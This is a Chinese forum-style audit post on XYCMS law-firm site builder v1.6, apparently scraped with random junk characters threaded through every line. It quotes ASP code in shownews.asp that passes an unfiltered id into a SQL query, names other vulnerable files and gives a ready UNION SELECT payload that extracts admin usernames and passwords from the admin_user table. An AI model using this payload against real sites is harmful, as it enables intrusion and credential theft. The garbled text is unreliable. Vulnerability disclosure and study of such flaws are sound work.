前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
! E& X" k* N4 P4 J6 \ ( J2 |& t" P' c2 A
淫荡分割线$ n9 h7 b9 P, F1 h, q. {" j/ X
--------------------------------------------------------
3 Y& v/ ?; P% n1 Z: u, J
' W) ?, Q( B* u审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
; p" S9 M0 S! z1 c5 w" ?3 e3 j0 h源码地址:http://down.chinaz.com/soft/29233.htm, |. A1 H; J2 _$ E; r
m. S, V6 M u e& N" ^漏洞文件:shownews.asp
8 I$ n) i) u! B5 |) K2 ~漏洞代码:7-13行8 k- x/ Y' i2 e" r# |0 c
8 I! G/ [+ g. G % q! ]$ ~ |: O4 y9 _ W
<%
, S/ I: a( j" z& m3 Sid=request.QueryString("id")
, n+ _' t+ }; s, O" j y # a( s# u# r* t; @" f' a
set snews=server.createobject("adodb.recordset") ( T; e+ l; [- E$ G7 D$ h; i
exec="select * from [news] where id="&id, g' z! R/ Z% z, _0 c, j
snews.open exec,conn,1,1- B) V: p5 W$ r! P& k9 E9 K
%>
/ q X; b1 s/ P5 q- M 9 Q, H, H5 x! X
% A: n# t0 l3 n/ @3 w! ^1 j什么过滤都没有 直造成注入
5 h. z. F L7 e8 Y0 t; Q
0 O! x% {5 @# F# S1 x& _% V注入点:http://127.0.0.1:99/shownews.asp?id=xx; i2 {+ E+ E t' ?5 o$ @7 b
' n4 j: S' _7 K. p, L4 q" r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找- b' U' r4 I' U- A& ?0 e& w
3 U" t/ H! x. A* P6 F# G3 W; d/ {/ R
1 Y9 x( B) [# `3 r8 T. s0 H% eexp: union select 1,admin,password,4,5,7 from admin_user
; p8 `5 I* o, N, g- ^- W0 v, Q4 G8 Y$ N4 [: ?) D
|